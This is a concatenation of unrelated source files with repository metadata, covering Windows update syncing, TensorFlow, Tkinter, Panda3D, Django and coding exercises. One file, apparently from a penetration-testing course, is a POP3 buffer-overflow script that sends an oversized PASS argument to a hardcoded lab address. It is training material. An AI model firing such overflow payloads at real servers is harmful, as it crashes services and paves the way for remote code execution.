        err = ["unknown failure", "2147352567", "2145107934"]
        if any(x in ret.lower() for x in err):
            agent.managed_by_wsus = True
            agent.save(update_fields=["managed_by_wsus"])
            return f"{agent.hostname} managed by wsus"
    else:
        # if previously managed by wsus but no longer (i.e moved into a different OU in AD)
        # then we can use salt to manage updates
        if agent.managed_by_wsus and type(ret) is dict:
            agent.managed_by_wsus = False
            agent.save(update_fields=["managed_by_wsus"])

    # GUIDs of every update salt reported (the dict keys).
    guids = []
    for k in ret.keys():
        guids.append(k)

    if not WinUpdate.objects.filter(agent=agent).exists():
        # First sync for this agent: insert every reported update.
        for i in guids:
            WinUpdate(
                agent=agent,
                guid=i,
                kb=ret[i]["KBs"][0],
                mandatory=ret[i]["Mandatory"],
                title=ret[i]["Title"],
                needs_reboot=ret[i]["NeedsReboot"],
                installed=ret[i]["Installed"],
                downloaded=ret[i]["Downloaded"],
                description=ret[i]["Description"],
                severity=ret[i]["Severity"],
            ).save()
    else:
        for i in guids:
            # check if existing update install / download status has changed
            if WinUpdate.objects.filter(agent=agent).filter(guid=i).exists():
                update = WinUpdate.objects.filter(agent=agent).get(guid=i)

                # Flip the stored flag to mirror salt's reported state.
                if ret[i]["Installed"] != update.installed:
                    update.installed = not update.installed
                    update.save(update_fields=["installed"])

                if ret[i]["Downloaded"] != update.downloaded:
                    update.downloaded = not update.downloaded
                    update.save(update_fields=["downloaded"])

            # otherwise it's a new update
            else:
                WinUpdate(
                    agent=agent,
                    guid=i,
                    kb=ret[i]["KBs"][0],
                    mandatory=ret[i]["Mandatory"],
                    title=ret[i]["Title"],
                    needs_reboot=ret[i]["NeedsReboot"],
                    installed=ret[i]["Installed"],
                    downloaded=ret[i]["Downloaded"],
                    description=ret[i]["Description"],
                    severity=ret[i]["Severity"],
                ).save()

    return "ok"
|
[
"dcparsi@gmail.com"
] |
dcparsi@gmail.com
|
494aff1c24d6117476f11ab965437fac14f43806
|
20c80f722c451b64d05cc027b66a81e1976c3253
|
/commons/libs/pyblish/version.py
|
c978ffa548ff2ad57bbaba63dc1da19b5ff66f43
|
[] |
no_license
|
flypotatojun/Barbarian
|
2d3fcb6fcb1b4495b6d62fc5e32634abf4638312
|
efe14dd24c65b4852997dad1290e503211bcc419
|
refs/heads/master
| 2021-07-18T01:43:14.443911
| 2017-10-24T03:37:43
| 2017-10-24T03:37:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 229
|
py
|
# Semantic-version components for this release.
VERSION_MAJOR = 1
VERSION_MINOR = 4
VERSION_PATCH = 3

# Tuple form for programmatic comparisons, e.g. version_info >= (1, 4).
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
# Dotted string form, e.g. "1.4.3".
version = '%i.%i.%i' % version_info
__version__ = version  # conventional PEP 8 alias
__all__ = ['version', 'version_info', '__version__']
|
[
"lonegather@users.noreply.github.com"
] |
lonegather@users.noreply.github.com
|
7003acb4f3816d60e19ac4b06f49d305dda66cfb
|
2cb120360192dfdf9afa233c8585232cb3df6e8c
|
/samples/tf_study/prettytensor/funcs/register.py
|
4d06d359b79901fe2eaade7d27002d9a528b7ee5
|
[] |
no_license
|
CosmosShadow/MLPythonLib
|
6323583bca8c6ff5757465fb1a0d5c4f23deb56c
|
3a2da2601330a032b737ff0addf71f679eeee94b
|
refs/heads/master
| 2020-05-21T15:08:58.082575
| 2017-04-30T17:03:15
| 2017-04-30T17:03:15
| 44,087,820
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
# coding: utf-8
import tensorflow as tf
import prettytensor as pt
import numpy as np
import cmtf.data.data_mnist as data_mnist
@pt.Register
def leaky_relu(input_pt):
    """Leaky ReLU registered as a prettytensor method: x where x > 0,
    else 0.01 * x.

    NOTE(review): tf.select is the pre-1.0 TensorFlow API (renamed
    tf.where later); this file targets an old TF release.
    """
    return tf.select(tf.greater(input_pt, 0.0), input_pt, 0.01*input_pt)


# Quick demo: wrap a variable and apply the newly registered op.
x = tf.Variable([1, 2, 3, -3, -2, -1], dtype=tf.float32)
x_pretty = pt.wrap(x)
y = x_pretty.leaky_relu()

with tf.Session() as sess:
    sess.run(tf.initialize_all_variables())
    print(sess.run(y))
|
[
"lichenarthurml@gmail.com"
] |
lichenarthurml@gmail.com
|
d387d6b7108eb53681abf09eee7e082564d3f4cd
|
90a3c3ecfab0425f520115e049dc6e8476b72b7c
|
/toph/Set Union.py
|
6fdfa05cf4cd80906d7f77ed398ea2bb349d9a95
|
[] |
no_license
|
Manash-git/Competitive-Programming
|
f3e5f7a9bc202ec0a4667fe7f033f0013c8dfd83
|
bf79517699285c135bc126c5fabfd724e586460f
|
refs/heads/master
| 2022-12-05T19:37:11.814718
| 2020-08-24T19:16:30
| 2020-08-24T19:16:30
| 108,683,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# n = {1,2,5}
# print(type(n))
# l= [1,5,6]
# print(type(set(l)))
# print(n | set(l))
# res = n | set(l)
# for i in res:
# print(i,end=" ")
# Sizes of the two input lists (read to consume the line; not otherwise used).
n, m = input().split()

# Read both element lists and deduplicate them in one step.
x = {int(token) for token in input().split()}
y = {int(token) for token in input().split()}

# Sorted union of the two sets.
res = sorted(x | y)
print(res)
for value in res:
    print(value, end=" ")
# for i in range(len(res)-1):
# print(res[i], end=" ")
# for i in range(len(res)):
# if i==len(res)-1:
# print(res[i])
# else:
# print(res[i],end=" ")
|
[
"emailatmanash@gmail.com"
] |
emailatmanash@gmail.com
|
5b2cd57f8e2194ec3817a24a6915598c622ca1b2
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/sphinx/sphinx/sphinx/search/nl.py
|
485c32c00bfbebd3c13c6fc237cc638855547bc0
|
[
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:691f5261422e51d9e03272aae70ab30a0ad6712d65759be6a8f9a41bd904a565
size 21944
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
ed8e7e07c105152f5bc9ba5fcc02fe65b2194e23
|
b0b9f05bcfb0e366955f70753bcbd0b7fc997e7a
|
/pairsWithSpecificSum.py
|
de68f3bf37ad2534a22358946844b725ef7cd5cc
|
[] |
no_license
|
mave5/pmarp
|
ae691e8fb3d7dc4cd51928ec240b077f09b27774
|
52aa9919e6384226ba10242144ceb5801a995071
|
refs/heads/master
| 2022-10-20T12:52:08.587884
| 2017-10-23T00:19:36
| 2017-10-23T00:19:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
# Merging 2 Packages
def get_indices_of_item_wights(arr, limit):
    """Return indices [j, i] (j < i) of two items in arr whose weights sum
    to limit, or [] when no such pair exists (including len(arr) < 2).

    Single pass with a complement map: for each weight w at index i, check
    whether limit - w was seen earlier. O(n) time, O(n) space.
    """
    # Fewer than two items can never form a pair.
    if len(arr) < 2:
        return []
    complements = {}  # weight -> first index it was seen at
    for i, w in enumerate(arr):
        # BUG FIX: the original looked up the module-level global `lim`
        # instead of the `limit` parameter, so any call with a different
        # limit silently used the wrong target sum.
        j = complements.get(limit - w)
        if j is not None:
            return [j, i]
        complements[w] = i
    return []
# Demo: the pair (4, 4) sums to the limit 8 -> expected indices [0, 1].
arr = [4, 4]
lim = 8
print get_indices_of_item_wights(arr,lim)  # Python 2 print statement
#%%
# find a pair with specific sum
def findPairSum(arr, s):
    """Two-pointer scan over a sorted list.

    Returns the pair (a, b) with a + b == s, or [] when no pair matches
    (note the inconsistent empty-result type is preserved).
    """
    lo, hi = 0, len(arr) - 1
    while lo < hi:
        total = arr[lo] + arr[hi]
        if total == s:
            return arr[lo], arr[hi]
        if total > s:
            hi -= 1  # sum too large: shrink from the right
        else:
            lo += 1  # sum too small: grow from the left
    return []
|
[
"mra446@gmail.com"
] |
mra446@gmail.com
|
cbeac3af8c846564c43834c3869b02822384413f
|
53b6b52a41ec415fec2a2d97cad524b8e9f8a4dc
|
/7_4_1/size.py
|
eb3ae38464d0a5f32857506357853e2ba0709ef4
|
[] |
no_license
|
xyalbino/pwk_exercises
|
56b8aa359b19487733c0a9b98b9d9ed668723365
|
c6af719381928164aee3c7ce8db685c7984269ec
|
refs/heads/master
| 2020-06-14T22:21:34.571883
| 2019-03-11T22:07:44
| 2019-03-11T22:07:44
| 195,143,280
| 1
| 0
| null | 2019-07-04T00:30:30
| 2019-07-04T00:30:30
| null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
#!/usr/bin/env python
import socket, sys
if __name__ == '__main__':
    # Buffer-overflow proof of concept (Python 2) against a POP3 service.
    # Layout: 2606 filler bytes, a 4-byte "BBBB" marker (presumably the
    # saved-return-address overwrite — confirm against the crash offset),
    # then "C" padding up to 3500 bytes total.
    buff = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock_conn = sock.connect(("10.11.21.97", 110))
        data = sock.recv(1024)
        print data
        sock.send("USER test\r\n")
        data = sock.recv(1024)
        print data
        # The oversized buffer is delivered as the PASS argument.
        sock.send("PASS {0}\r\n".format(buff))
        data = sock.recv(1024)
        print data
    except socket.error:
        print("[x] Unable to connect...")
    finally:
        sock.close()
        sys.exit(0)
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
e4b6e1cda54c6b2fd375df3d4a64e7a4eae646c4
|
808b96265c56807d9b1ddcbd93af00988bc3d5c1
|
/main.py
|
8aca8d644d250287044cfd44e73b7f42b8313317
|
[] |
no_license
|
shivamdattapurkayastha99/drs-system
|
b1af2d087d5ac04294dcad3fcdb921d22a4b4b27
|
d35f347e6a8030c47dc0604490e360e4e63c1534
|
refs/heads/master
| 2023-07-06T18:35:33.594613
| 2021-08-10T20:20:20
| 2021-08-10T20:20:20
| 394,772,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream=cv2.VideoCapture('clip.mp4')
def play(speed):
    """Step the replay video by `speed` frames (negative = rewind) and
    draw the resulting frame on the canvas with a 'Decision Pending' label.

    speed: frame delta applied to the capture's current position.
    """
    print(f"You clicked on play.Speed is {speed}")
    # Jump the capture position relative to the current frame.
    frame1 = stream.get(cv2.CAP_PROP_POS_FRAMES)
    stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
    grabbed, frame = stream.read()
    # Resize to the canvas and convert to a Tk-displayable image.
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    # Keep a reference on the canvas so Tk doesn't garbage-collect the image.
    canvas.image = frame
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    canvas.create_text(120, 25, fill="green", font="Times 20", text="Decision Pending")
def out():
    """Kick off the 'out' decision animation on a background thread."""
    worker = threading.Thread(target=pending, args=("out",))
    worker.daemon = 1  # don't block interpreter exit on this thread
    worker.start()
    print("player is out")
def not_out():
    """Kick off the 'not out' decision animation on a background thread."""
    worker = threading.Thread(target=pending, args=("not out",))
    worker.daemon = 1  # don't block interpreter exit on this thread
    worker.start()
    print("player is not out")
def pending(decision):
    """Play the decision-reveal sequence on the canvas: 'pending' splash,
    sponsor screen, then the final out / not-out image.

    decision: 'out' selects out.png; anything else selects not_out.png.
    Runs on a worker thread; sleeps are the on-screen display durations.
    """
    # 1) 'Decision pending' splash for 1 second.
    frame = cv2.cvtColor(cv2.imread("pending.png"), cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    canvas.image = frame  # keep a reference so Tk doesn't drop the image
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    time.sleep(1)
    # 2) Sponsor screen for 1.5 seconds.
    frame = cv2.cvtColor(cv2.imread("sponsor.png"), cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    canvas.image = frame
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    time.sleep(1.5)
    # 3) Final verdict image.
    if decision == 'out':
        decisionImg = 'out.png'
    else:
        decisionImg = 'not_out.png'
    frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    canvas.image = frame
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
# --- GUI setup (module level) ---

# Fixed display size for every frame/image shown on the canvas.
SET_WIDTH = 650
SET_HEIGHT = 368

window = tkinter.Tk()
window.title("Shivam DRS")

# Welcome screen: OpenCV reads BGR, convert to RGB for PIL/Tk display.
cv_img = cv2.cvtColor(cv2.imread("welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, width=SET_WIDTH, height=SET_HEIGHT)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
# BUG FIX: the option was misspelled "ancho"; Tk expects "anchor".
image_on_canvas = canvas.create_image(0, 0, anchor=tkinter.NW, image=photo)
canvas.pack()

# BUG FIX: ",width=50" was accidentally embedded inside every button's
# label string; it was clearly meant to be the Button width option.
btn = tkinter.Button(window, text="<<Previous(fast)", width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<<Previous(slow)", width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next(fast)>>", width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Next(slow)>>", width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=not_out)
btn.pack()

window.mainloop()
|
[
"shivamdatta465@gmail.com"
] |
shivamdatta465@gmail.com
|
f30e390e9256b93999d1c3a66ed1a5ae6ada94e0
|
e262e64415335060868e9f7f73ab8701e3be2f7b
|
/.history/demo_20201106173944.py
|
6d65b718ae355669c834ddbbe48686434fa086b7
|
[] |
no_license
|
Allison001/developer_test
|
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
|
b8e04b4b248b0c10a35e93128a5323165990052c
|
refs/heads/master
| 2023-06-18T08:46:40.202383
| 2021-07-23T03:31:54
| 2021-07-23T03:31:54
| 322,807,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
# a = 1
# if a==0:
# print("a=0")
# else:
# print("a!0")
# """
# x>1 (3x-5)
# -1<=x<=1 (x+2)
# x < -1 (5x+3)
# """
# x = int(input("输入您的数字:"))
# if x > 1:
# print(3*x-5)
# else:
# if x >= -1:
# print(x + 2)
# else:
# print(5*x+3)
# 猜数字游戏
# import random
# computet_num = random.randint(1,100)
# while True:
# people_num = int(input("请输入您的数字:"))
# if people_num < computet_num:
# print("大一点")
# elif people_num > computet_num:
# print("小一点")
# else:
# print("猜对了")
# break
# def fun1(a,b,c):
# print("这是参数a:",a)
# print("这是参数b:",b)
# print("这是参数c:",c)
# fun1(1,23,4)
# def fun1(a):
# # return "ac"
# print("a")
# fun1("c")
# def fun1(a,b,c,d):
# print(a,b,c,d)
# fun1(10,13,d=13,c=90)
# fun1 = lambda x: x+10
# print(fun1(5))
# def fun1(x):
# return x+10
# print(fun1(5))
# fun1 = lambda x,y: x+y
# print(fun1(10,12))
# list = ["ha"]
# b = {"hah"}
# c = "a"
# d = ("a","v")
# print(type(list))
# print(type(b))
# print(type(c))
# print(type(d))
# List-method practice: drop the first element and show what's left.
lista = ["a", "b", "c"]
del lista[0]  # same effect as lista.pop(0); the popped value was unused
print(lista)
|
[
"zhangyingxbba@gmail.com"
] |
zhangyingxbba@gmail.com
|
cec74534f2de9765f471aa6aae72fcbe7d53e3ac
|
0085acce00bbd20658f312f30575632b6272090d
|
/leetcode_python2/lc917_reverse_only_letters.py
|
edd5790198b06f867191c4684a3f882a2b368ac8
|
[] |
no_license
|
garderobin/Leetcode
|
52fce8279e4963bc7824a19aae903ca6aad83867
|
ea10ce7fe465431399e444c6ecb0b7560b17e1e4
|
refs/heads/master
| 2021-01-17T14:43:49.423071
| 2018-11-12T00:55:47
| 2018-11-12T00:55:47
| 51,183,667
| 0
| 1
| null | 2018-11-12T00:55:48
| 2016-02-06T01:00:36
|
Java
|
UTF-8
|
Python
| false
| false
| 580
|
py
|
from abc import ABCMeta, abstractmethod
class ReverseOnlyLetters:
    """Interface for LeetCode 917 'Reverse Only Letters'.

    NOTE(review): `__metaclass__ = ABCMeta` is Python-2 syntax; under
    Python 3 it has no effect, so @abstractmethod is not enforced there.
    """
    __metaclass__ = ABCMeta

    @abstractmethod
    def reverse_only_letters(self, S):
        """
        :type S: str
        :rtype: str
        """
class ReverseOnlyLettersImpl1(ReverseOnlyLetters):
    """
    Reverse the letters of S while leaving every non-letter in place.
    Time: O(n)
    Space: O(n)
    """
    def reverse_only_letters(self, S):
        # Stack of the letters in original order; letters are consumed
        # from the end of the stack while non-letters stay put.
        stack = [ch for ch in S if ch.isalpha()]
        out = []
        for ch in S:
            out.append(stack.pop() if ch.isalpha() else ch)
        return ''.join(out)
|
[
"garderobinshot@hotmail.com"
] |
garderobinshot@hotmail.com
|
b8466fc6eb726ee2342e5e499d2da3d64d0cb182
|
76938f270e6165514162856b2ed33c78e3c3bcb5
|
/lib/coginvasion/battle/TurretGag.py
|
f6649cdc3a30755cf243d311c6153058e48d7e42
|
[] |
no_license
|
coginvasion/src
|
9a5ec682845cc4c9c013fcc35e9b379bd4360b6c
|
2d7fcdb0cd073050250cb51292ee48300a9fe19f
|
refs/heads/master
| 2021-01-19T06:50:11.786112
| 2015-11-08T12:28:52
| 2015-11-08T12:28:52
| 61,545,543
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,296
|
py
|
# Embedded file name: lib.coginvasion.battle.TurretGag
"""
Filename: TurretGag.py
Created by: DecodedLogic (10Aug15)
"""
from panda3d.core import CollisionSphere, CollisionNode, BitMask32, CollisionHandlerEvent, NodePath
from direct.showbase.DirectObject import DirectObject
from direct.interval.ProjectileInterval import ProjectileInterval
from direct.actor.Actor import Actor
from lib.coginvasion.globals import CIGlobals
from lib.coginvasion.gags.GagManager import GagManager
class TurretGag(DirectObject):
    def __init__(self, turret, collideEventName, gagName):
        """Projectile gag fired from a turret cannon.

        turret: owning turret (supplies the cannon node and locality).
        collideEventName: messenger event fired when the gag hits something.
        gagName: name of the gag to load via GagManager.
        """
        DirectObject.__init__(self)
        self.turret = turret
        self.collideEventName = collideEventName
        # Unique per-instance names so multiple turrets can coexist.
        self.eventName = 'turretGagSensor' + str(id(self)) + '-into'
        self.trackName = 'turretGagTrack' + str(id(self))
        self.track = None
        # Flight-arc tuning passed to the ProjectileInterval in shoot().
        self.gravityMult = 0.9
        self.duration = 2.5
        self.setClass(gagName)
        return
    def setClass(self, gagName):
        """Look up the gag class by name and reset the model reference."""
        gagMgr = GagManager()
        self.gagClass = gagMgr.getGagByName(gagName)
        self.gag = None  # model node is created later by build()
        return
def build(self):
self.gagClass.build()
self.gag = self.gagClass.getGag()
self.gag.reparentTo(self.turret.getCannon())
self.gag.setY(5.2)
self.gag.setHpr(90, -90, 90)
if isinstance(self.gag, Actor):
self.gag.loop('chan')
def shoot(self, rangeVector):
if not self.gag:
return
rangeNode = NodePath('Shoot Range')
rangeNode.reparentTo(self.turret.getCannon())
rangeNode.setScale(render, 1)
rangeNode.setPos(rangeVector)
rangeNode.setHpr(90, -90, 90)
self.gag.setScale(self.gag.getScale(render))
self.gag.setScale(self.gag.getScale(render))
self.gag.setPos(self.gag.getPos(render))
self.gag.reparentTo(render)
self.gag.setHpr(rangeNode.getHpr(render))
base.audio3d.attachSoundToObject(self.gagClass.woosh, self.gag)
self.gagClass.woosh.play()
self.track = ProjectileInterval(self.gag, startPos=self.gag.getPos(render), endPos=rangeNode.getPos(render), gravityMult=self.gravityMult, duration=self.duration, name=self.trackName)
self.track.setDoneEvent(self.track.getName())
self.acceptOnce(self.track.getDoneEvent(), self.cleanup)
self.track.start()
fireSfx = base.audio3d.loadSfx('phase_4/audio/sfx/MG_cannon_fire_alt.mp3')
base.audio3d.attachSoundToObject(fireSfx, self.turret.getCannon())
fireSfx.play()
if self.turret.isLocal():
self.buildCollisions()
self.acceptOnce(self.eventName, self.handleCollision)
def getGag(self):
return self.gag
def buildCollisions(self):
pieSphere = CollisionSphere(0, 0, 0, 1)
pieSensor = CollisionNode('turretGagSensor' + str(id(self)))
pieSensor.addSolid(pieSphere)
pieNP = self.gag.attachNewNode(pieSensor)
pieNP.setCollideMask(BitMask32(0))
pieNP.node().setFromCollideMask(CIGlobals.WallBitmask | CIGlobals.FloorBitmask)
event = CollisionHandlerEvent()
event.set_in_pattern('%fn-into')
event.set_out_pattern('%fn-out')
base.cTrav.addCollider(pieNP, event)
def handleCollision(self, entry):
messenger.send(self.collideEventName, [entry, self])
def getID(self):
return self.gagClass.getID()
def getCollideEventName(self):
return self.collideEventName
def cleanup(self):
if hasattr(self, 'collideEventName'):
del self.collideEventName
if self.track:
self.track.finish()
self.track = None
if self.turret:
if self.turret.entities and self in self.turret.entities:
self.turret.entities.remove(self)
self.turret = None
self.ignore(self.eventName)
self.duration = None
self.gravityMult = None
self.eventName = None
self.trackName = None
if self.gagClass:
self.gagClass.cleanupGag()
self.gagClass = None
if self.gag:
if isinstance(self.gag, Actor):
self.gag.cleanup()
self.gag.removeNode()
self.gag = None
return
|
[
"ttarchive@yandex.com"
] |
ttarchive@yandex.com
|
96e2fee44e3bc7e5c5602c9a487d8a04b807a7a8
|
c67f2d0677f8870bc1d970891bbe31345ea55ce2
|
/zippy/benchmarks/src/micro/function-call2.py
|
48b9f47030ccbdc325c255fd7103349718f10ba7
|
[
"BSD-3-Clause"
] |
permissive
|
securesystemslab/zippy
|
a5a1ecf5c688504d8d16128ce901406ffd6f32c2
|
ff0e84ac99442c2c55fe1d285332cfd4e185e089
|
refs/heads/master
| 2022-07-05T23:45:36.330407
| 2018-07-10T22:17:32
| 2018-07-10T22:17:32
| 67,824,983
| 324
| 27
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
# zwei 10/10/13
# function calls
import time
def emptyFunction(arg):
    # Minimal call target: returns its argument unchanged so the benchmark
    # measures pure call overhead, not work done inside the function.
    return arg

def callFunctions(num):
    # Invoke the empty function `num` times and count the iterations.
    # NOTE(review): `xrange` is Python 2 only — this file targets a
    # Python-2-compatible runtime (ZipPy benchmark suite).
    count = 0
    for i in xrange(num):
        ret = emptyFunction(i)
        count += 1
    return count

def measure():
    # Time one very large batch of calls and print the elapsed seconds.
    print("Start timing...")
    start = time.time()
    sum = callFunctions(1000000000) #1000000
    print("Number of calls ", sum)
    duration = "%.3f\n" % (time.time() - start)
    print("function-call: " + duration)

#warm up
# Repeated smaller runs let a JIT-compiling runtime optimize the hot loop
# before the timed measurement.
for run in xrange(10000):
    callFunctions(50000)

measure()
|
[
"ndrzmansn@gmail.com"
] |
ndrzmansn@gmail.com
|
c09bdad7664c65fe8d8e3cb86ec8865551e304a9
|
1c6e5c808c1a3e6242e40b15ae711574e670c3b6
|
/food_management/constants/enums.py
|
82bfebbb5237fed3541c3c18fdce86151e5b05c3
|
[] |
no_license
|
KatakamVedaVandhana/smart_food_management-vandhana
|
dbe195994c110471d0ae7a5a53adef1441e86466
|
19e410a2aa792b22889a2dfed599312ba6b5a7ad
|
refs/heads/master
| 2023-07-09T05:43:17.491313
| 2020-06-15T06:44:00
| 2020-06-15T06:44:00
| 269,609,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,043
|
py
|
import enum
from ib_common.constants import BaseEnumClass
class CodeLanguage(BaseEnumClass, enum.Enum):
    # Programming-language identifiers for code execution environments.
    python = "PYTHON"
    c_language = "C"
    c_plus_plus = "CPP"
    python36 = "PYTHON36"
    python37 = "PYTHON37"
    python38 = "PYTHON38"
    python38_datascience = "PYTHON38_DATASCIENCE"
    python38_aiml = "PYTHON38_AIML"


class CategoryType(BaseEnumClass, enum.Enum):
    # Food categories a meal item can belong to.
    indian_bread = "Indian-Bread"
    curry = "Curry"
    rice = "Rice"


class UnitType(BaseEnumClass, enum.Enum):
    # Serving units used when specifying item quantities.
    pieces = "pieces"
    cups = "cups"
    laddles = "laddles"


class TypeOfMeal(BaseEnumClass, enum.Enum):
    # The three daily meal slots.
    breakfast = "Breakfast"
    lunch = "Lunch"
    dinner = "Dinner"


class CourseType(BaseEnumClass, enum.Enum):
    # How a user chooses to take (or skip) a meal.
    half_meal = 'Half-meal'
    full_meal = 'Full-meal'
    custom_meal = 'Custom-meal'
    skip_meal = 'Skip-meal'


class RatingType(BaseEnumClass, enum.Enum):
    # 1-5 star meal rating values.
    one = 1
    two = 2
    three = 3
    four = 4
    five = 5


class BaseUnitType(BaseEnumClass, enum.Enum):
    # Base units items are measured in for inventory purposes.
    pieces = 'pieces'
    kilogram = 'kg'
|
[
"vandhanakatakam@gmail.com"
] |
vandhanakatakam@gmail.com
|
b16fadb21431c33e8e177f4b007b85063c3e167a
|
9f52ac141023dcddb4fbe88b881feaca5be6328f
|
/ros/build/styx_msgs/catkin_generated/pkg.develspace.context.pc.py
|
18610254de217a4132dbf9fb576247ad636a13ec
|
[
"MIT"
] |
permissive
|
uniquetrij/CarND-T3-P4-Capstone
|
9b6613339eb33421112130e7b37f46aaaa88a298
|
82f85af8c5554b51afca3c282f6230d3733a376a
|
refs/heads/master
| 2020-03-18T11:53:58.175809
| 2018-06-08T05:54:29
| 2018-06-08T05:54:29
| 134,696,861
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
# Machine-generated pkg-config context for the `styx_msgs` catkin package
# (devel-space variant); values are substituted by CMake — do not edit by hand.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include".split(';') if "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "styx_msgs"
PROJECT_SPACE_DIR = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
|
[
"anupamb266@gmail.com"
] |
anupamb266@gmail.com
|
1300873c8a24b12df81df6006a135fe297dab299
|
7095bd6c7df3e36beeaf6f2fff321c1994778817
|
/try_django/src/blog/migrations/0003_auto_20190609_1303.py
|
8b419d2c612ca7e259bd41fb33966cc36ccff5fd
|
[] |
no_license
|
bajpaiNikhil/dev-blog
|
4c6f0b5d6a96cc2552acd91b44e3fe74629bdaed
|
b2a3823931520292cabaeba94bd8161265f143b0
|
refs/heads/master
| 2020-06-02T08:39:12.043844
| 2019-07-04T03:25:37
| 2019-07-04T03:25:37
| 191,102,800
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# Generated by Django 2.2 on 2019-06-09 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: make `BlogPost.slug` unique,
    backfilling existing rows with the default 'my-slug'."""

    dependencies = [
        ('blog', '0002_blogpost_slug'),
    ]

    operations = [
        migrations.AlterField(
            model_name='blogpost',
            name='slug',
            field=models.SlugField(default='my-slug', unique=True),
        ),
    ]
|
[
"nikhil.cse16@gmail.com"
] |
nikhil.cse16@gmail.com
|
3d325135422a83e7942d4164fb53d194a67e4d51
|
f13acd0d707ea9ab0d2f2f010717b35adcee142f
|
/AtCoder_Virtual_Contest/20181228-AtCoder Run/abc060/a.py
|
e46e119bb58a491f4e1804883c6cc27488c5b02f
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
KATO-Hiro/AtCoder
|
126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7
|
bf43320bc1af606bfbd23c610b3432cddd1806b9
|
refs/heads/master
| 2023-08-18T20:06:42.876863
| 2023-08-17T23:45:21
| 2023-08-17T23:45:21
| 121,067,516
| 4
| 0
|
CC0-1.0
| 2023-09-14T21:59:38
| 2018-02-11T00:32:45
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# -*- coding: utf-8 -*-
def main():
    """Read three space-separated words from stdin and print YES when they
    chain: each word must begin with the last letter of the previous one."""
    a, b, c = input().split()
    # Word-chain condition: last letter of `a` starts `b`, last of `b` starts `c`.
    print('YES' if a[-1] == b[0] and b[-1] == c[0] else 'NO')


if __name__ == '__main__':
    main()
|
[
"k.hiro1818@gmail.com"
] |
k.hiro1818@gmail.com
|
27595488cbfbd204c5edd5aa32464d6815764993
|
4e67c2edd71493a98a3f13e5b2073c1d05b1b656
|
/Semestre 01/LogicaProgramacao/Aula 04.08.2020/Decrescente.py
